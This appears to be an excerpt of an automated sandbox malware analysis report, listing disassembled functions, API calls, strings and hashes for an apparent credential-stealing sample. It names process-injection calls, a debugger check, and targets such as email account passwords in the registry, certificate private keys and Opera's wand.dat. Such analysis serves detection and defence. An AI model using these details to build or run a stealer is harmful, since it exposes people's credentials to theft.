libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000,?,?,00000000), ref: 00BA183A
WriteProcessMemory.KERNELBASE(00000000,?,-00000034,00000004,00000000,?,?,00000000), ref: 00BA186F
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA18A4
GetProcAddress.KERNELBASE(00000000), ref: 00BA18AB
Wow64SetThreadContext.KERNEL32(00000004,?,?,?,00000000), ref: 00BA18B7
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA18E2
GetProcAddress.KERNELBASE(00000000), ref: 00BA18E9
ResumeThread.KERNELBASE(00000004,?,?,00000000), ref: 00BA18F4
LoadLibraryExA.KERNELBASE(D5C9DED0,00000000,00000000), ref: 00BA191F
GetProcAddress.KERNELBASE(00000000), ref: 00BA1926
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BA1934

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$MemoryProcessThreadWrite$ContextFreeResumeVirtualWow64
String ID:
API String ID: 1726148318-0
Opcode ID: 1473b19d8cb2c3888e2147cf74ace72cf48d8ff1206f8c17138d3331a5090021
Instruction ID: 6e7be3f876f656ba3ca534c5e0ab09f3c064803f0a0f94ea40813ae42e30ffce
Opcode Fuzzy Hash: 1473b19d8cb2c3888e2147cf74ace72cf48d8ff1206f8c17138d3331a5090021
Instruction Fuzzy Hash: C8318D71108301AFD364DB64CC89FABB3E9FB89314F54895CF29AC7291DB34A445CB62

Non-executed Functions

Function 00BA229A Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00BA2504
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BA2519
UnhandledExceptionFilter.KERNEL32(00BA7130), ref: 00BA2524
GetCurrentProcess.KERNEL32(C0000409), ref: 00BA2540
TerminateProcess.KERNEL32(00000000), ref: 00BA2547

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: bca0bf1a1c12110a8c5036b5c5f5b26b6e4c1ec0d72c10ac06834da2dfbae318
Instruction ID: 31477684e88f4f4d7b12601cd1be02b789d14066a292e1f330abedc49fff2d35
Opcode Fuzzy Hash: bca0bf1a1c12110a8c5036b5c5f5b26b6e4c1ec0d72c10ac06834da2dfbae318
Instruction Fuzzy Hash: 4B21EEB8948604EFD710DF68FD8A6857BE0FB4A320F50505AE90987360EFB05A84EF59

Function 00BA1C70 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00BA1C94

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: ad4eedcc763d1f903a4a212b3c9c4d433d3fc78637cf3049a47ff37fc03f603f
Instruction ID: 8d1cbe3cd1a8df65e07ce0c3e5af08668c488ba472199623c3989085f7fe6ad9
Opcode Fuzzy Hash: ad4eedcc763d1f903a4a212b3c9c4d433d3fc78637cf3049a47ff37fc03f603f
Instruction Fuzzy Hash: 09313231F183244BDA78D76CD85276EB3D5EB9A361FC54CBAE4C9CB281E5398C448782

Function 00BA1000 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40

Function 00BA3595 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00BA235C), ref: 00BA359D
__mtterm.LIBCMT ref: 00BA35A9

Part of subcall function 00BA32E2: DecodePointer.KERNEL32(00000004,00BA370B,?,00BA235C), ref: 00BA32F3
Part of subcall function 00BA32E2: TlsFree.KERNEL32(00000002,00BA370B,?,00BA235C), ref: 00BA330D
Part of subcall function 00BA32E2: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00BA370B,?,00BA235C), ref: 00BA3A73
Part of subcall function 00BA32E2: _free.LIBCMT ref: 00BA3A76
Part of subcall function 00BA32E2: DeleteCriticalSection.KERNEL32(00000002,76EF5810,?,00BA370B,?,00BA235C), ref: 00BA3A9D

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BA35BF
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BA35CC
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BA35D9
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BA35E6
TlsAlloc.KERNEL32(?,00BA235C), ref: 00BA3636
TlsSetValue.KERNEL32(00000000,?,00BA235C), ref: 00BA3651
__init_pointers.LIBCMT ref: 00BA365B
EncodePointer.KERNEL32(?,00BA235C), ref: 00BA366C
EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3679
EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3686
EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3693
DecodePointer.KERNEL32(00BA3466,?,00BA235C), ref: 00BA36B4
__calloc_crt.LIBCMT ref: 00BA36C9
DecodePointer.KERNEL32(00000000,?,00BA235C), ref: 00BA36E3
GetCurrentThreadId.KERNEL32 ref: 00BA36F5

Strings

FlsGetValue, xrefs: 00BA35C1
FlsAlloc, xrefs: 00BA35B9
FlsFree, xrefs: 00BA35DB
FlsSetValue, xrefs: 00BA35CE
KERNEL32.DLL, xrefs: 00BA3598

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 9fb36df3b225abf917b687709a6bba0f4b85389b51360a7d3be232c680292001
Instruction ID: 4f11bc8fa9b280f1c531659781a39aa058b0c47e0b1ee7d7505a2adfcfd418cf
Opcode Fuzzy Hash: 9fb36df3b225abf917b687709a6bba0f4b85389b51360a7d3be232c680292001
Instruction Fuzzy Hash: 2E311871D4C210AAC761AF78AC0AA1A3FE4FB57B61B1045AAF414D32B4EF748940CF69

Function 00BA331F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00BA88C0,00000008,00BA3427,00000000,00000000,?,00BA28EB,00000003), ref: 00BA3330
__lock.LIBCMT ref: 00BA3364

Part of subcall function 00BA3B86: __mtinitlocknum.LIBCMT ref: 00BA3B9C
Part of subcall function 00BA3B86: __amsg_exit.LIBCMT ref: 00BA3BA8
Part of subcall function 00BA3B86: EnterCriticalSection.KERNEL32(?,?,?,00BA3369,0000000D,?,00BA28EB,00000003), ref: 00BA3BB0

InterlockedIncrement.KERNEL32(00BA9320), ref: 00BA3371
__lock.LIBCMT ref: 00BA3385
___addlocaleref.LIBCMT ref: 00BA33A3

Strings

KERNEL32.DLL, xrefs: 00BA332B

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: e9eb8c14be5c9c12decc70c20fb3ceb00b59bb44956a66ab37ff83320333533f
Instruction ID: 65036895dc877b88cb193361d6f4b791ecbaa6cbc46a09f5207ccca701533cb6
Opcode Fuzzy Hash: e9eb8c14be5c9c12decc70c20fb3ceb00b59bb44956a66ab37ff83320333533f
Instruction Fuzzy Hash: C80161B144CB009FD720AF65D806749FBE0AF52721F10898DF496977A0CFB4AA44CB14

Function 00BA49BB Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00BA49C7

Part of subcall function 00BA344C: __getptd_noexit.LIBCMT ref: 00BA344F
Part of subcall function 00BA344C: __amsg_exit.LIBCMT ref: 00BA345C

__amsg_exit.LIBCMT ref: 00BA49E7
__lock.LIBCMT ref: 00BA49F7
InterlockedDecrement.KERNEL32(?), ref: 00BA4A14
_free.LIBCMT ref: 00BA4A27
InterlockedIncrement.KERNEL32(02C71660), ref: 00BA4A3F

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 5701f63cc9cfb677384c1952027d3023dc48f1614d7469fdf4eeb4cf3c63848f
Instruction ID: f00341591ab9248757cb41007319901de1e56ab9d7bd18d9429514e90bccfb97
Opcode Fuzzy Hash: 5701f63cc9cfb677384c1952027d3023dc48f1614d7469fdf4eeb4cf3c63848f
Instruction Fuzzy Hash: CA016D72A4C721ABD721AB689806B9FB3E0EB87B21F040195F414676A2CFB45D80DBD5

Function 00BA5D70 Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 00BA5D7E

Part of subcall function 00BA5C5A: __FF_MSGBANNER.LIBCMT ref: 00BA5C73
Part of subcall function 00BA5C5A: __NMSG_WRITE.LIBCMT ref: 00BA5C7A
Part of subcall function 00BA5C5A: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00BA4F26,?,00000001,?,?,00BA3B11,00000018,00BA8930,0000000C,00BA3BA1), ref: 00BA5C9F

_free.LIBCMT ref: 00BA5D91

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 126aa0cd4bbaf6bd83302dc6565e0073fdbdffde6e56ae5bd07109f0123fce88
Instruction ID: 446e706f0486d37425003de9031f07398d228627da88ef32c62dcaa9a64c6502
Opcode Fuzzy Hash: 126aa0cd4bbaf6bd83302dc6565e0073fdbdffde6e56ae5bd07109f0123fce88
Instruction Fuzzy Hash: A811863284CA10AFCB312F74AC09A5A3AE5DF97761B2105B6F94896150DF318B4196A0

Function 00BA52B7 Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00BA52C3

Part of subcall function 00BA344C: __getptd_noexit.LIBCMT ref: 00BA344F
Part of subcall function 00BA344C: __amsg_exit.LIBCMT ref: 00BA345C

__getptd.LIBCMT ref: 00BA52DA
__amsg_exit.LIBCMT ref: 00BA52E8
__lock.LIBCMT ref: 00BA52F8
__updatetlocinfoEx_nolock.LIBCMT ref: 00BA530C

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 203fa3779de82baab59e6dea5f7548544cbb6c1dbaa0a6f739c5715a9f5a3d1f
Instruction ID: eed670ac18b967e62f7e4a33f07424a6f070af35b6b4aa073188ea672a5206ba
Opcode Fuzzy Hash: 203fa3779de82baab59e6dea5f7548544cbb6c1dbaa0a6f739c5715a9f5a3d1f
Instruction Fuzzy Hash: FCF0907290CB10ABD671BB689803B5E76D0AF07B20F1541C9F401AB6D2CF745F40DA5A

Analysis Process: a5gvJhukP7.exePID: 6608, Parent PID: 6436COMMON

Execution Graph

Execution Coverage:	21.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	36

Executed Functions

Function 0040E9CE Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E9E1
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EA15
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040ECD0

Strings

PopServer, xrefs: 0040EA7D
EmailAddress, xrefs: 0040EA47
SmtpPassword, xrefs: 0040EB4E
SmtpServer, xrefs: 0040EAF3
SmtpAccount, xrefs: 0040EB2E
PopAccount, xrefs: 0040EAB8
SmtpPort, xrefs: 0040EB13
PopPassword, xrefs: 0040EAD8
PopPort, xrefs: 0040EA9D
Technology, xrefs: 0040EA62

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 1332880857-2111798378
Opcode ID: e80406472bb677dfadbd1bfb2f5a7eca4a6c273fc6832594016211cb0775a8e6
Instruction ID: 39ebad9792fab98b84e61b2ac53ddf023059776370fc8ac86ac537817e1fca94
Opcode Fuzzy Hash: e80406472bb677dfadbd1bfb2f5a7eca4a6c273fc6832594016211cb0775a8e6
Instruction Fuzzy Hash: BC71833190011CBADF226F51CC42BDDBAB6BF04704F5485FAB588741B1DB7A5BA1AF88

Function 0040D1E9 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertOpenSystemStoreA.CRYPT32(00000000,004168B0), ref: 0040D26F
CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D288
lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D2B9

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

lstrcmpA.KERNEL32(?,004168BD,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D2F1
CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D30D
CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D325
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D33E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D363
CryptDestroyKey.ADVAPI32(?), ref: 0040D3A1
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D3AC
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D3D4

Strings

2.5.29.37, xrefs: 0040D2B2

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
String ID: 2.5.29.37
API String ID: 2649496969-3842544949
Opcode ID: 0792c9f789115089a0e6fd09dc6711bed28ab025e4bcdce8770f8b6267e31e7c
Instruction ID: da31761f07a1f9bbf3cf79f080f8cacd2302d4bfd3def7505134cbf2f45f95af
Opcode Fuzzy Hash: 0792c9f789115089a0e6fd09dc6711bed28ab025e4bcdce8770f8b6267e31e7c
Instruction Fuzzy Hash: DE514531900209EBEF21ABD0DC09BEEBA75BB44310F10813AF901B11F0D7B9AA94DB4D

Function 00404CB4 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00404D24
lstrcmpiA.KERNEL32(00414FF5,?), ref: 00404D4D
lstrcmpiA.KERNEL32(00414FF7,?), ref: 00404D6A
FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404E19
FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404E2C

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

Sites\, xrefs: 00404DE7
.ini, xrefs: 00404DB2
*.*, xrefs: 00404CF3
\*.*, xrefs: 00404CE4

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$.ini$Sites\$\*.*
API String ID: 3040542784-999409347
Opcode ID: 0aae2518a55fb08389f6f3a29f2d076f42047f7be90bd65fcc480f2afca4d405
Instruction ID: 1671739f4b5778c115ec03523a64e3ba0249c514f6e7c98cb4b23fe6f9a4befd
Opcode Fuzzy Hash: 0aae2518a55fb08389f6f3a29f2d076f42047f7be90bd65fcc480f2afca4d405
Instruction Fuzzy Hash: 5E3188B1904209AAEF21BF61CC41BEE7769AF80304F1045B7B518B51E1DB7C8FD19EA9

Function 0040443E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(0000009C), ref: 00404487
GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 0040450C
GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404535
GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004045EA
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404609
GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404619
GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404627

Strings

kernel32.dll, xrefs: 004045E5
GetNativeSystemInfo, xrefs: 004045FE
HWID, xrefs: 00404563

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
String ID: GetNativeSystemInfo$HWID$kernel32.dll
API String ID: 1787888500-92997708
Opcode ID: ad4126b2f356a7b41a78327c2c8fbf31f5c3bc83834b15e605a7b3f2a50623dc
Instruction ID: 0b574c2c967b818523614ca4da9863b103fd095a21c960e0ef507add7f9a0003
Opcode Fuzzy Hash: ad4126b2f356a7b41a78327c2c8fbf31f5c3bc83834b15e605a7b3f2a50623dc
Instruction Fuzzy Hash: D5516471A00218BEEF217B61CC42F9D7A75AF85308F1080BAB749790E1C7B94ED19B59

Function 0040891F Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00408974
lstrcmpiA.KERNEL32(00414FF5,?), ref: 004089A7
lstrcmpiA.KERNEL32(00414FF7,?), ref: 004089C1
StrStrIA.SHLWAPI(?,opera,00000000,00414FF7,?,00414FF5,?,00000000,?), ref: 00408A06
FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408A34
FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408A47

Strings

opera, xrefs: 004089FB
wand.dat, xrefs: 00408A0F
\*.*, xrefs: 00408943

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*$opera$wand.dat
API String ID: 3663067366-3278183560
Opcode ID: cc8c2ae1ec805632a3dc2e560b6fd5fbc516fb0a31a8cbc763ae18f0584e6b5d
Instruction ID: 5f5eba21616bee276de1379284b9277ec38cfd227afb08a9fc9774cebfde712f
Opcode Fuzzy Hash: cc8c2ae1ec805632a3dc2e560b6fd5fbc516fb0a31a8cbc763ae18f0584e6b5d
Instruction Fuzzy Hash: 45310F71A1021DAAEF21AB61CD42BE977B5AF44304F0040BBB54CB51E1DB789FC19F59

Function 00403FE7 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00404057
lstrcmpiA.KERNEL32(00414FF5,?), ref: 00404084
lstrcmpiA.KERNEL32(00414FF7,?), ref: 004040A1
FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040416B
FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040417E

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
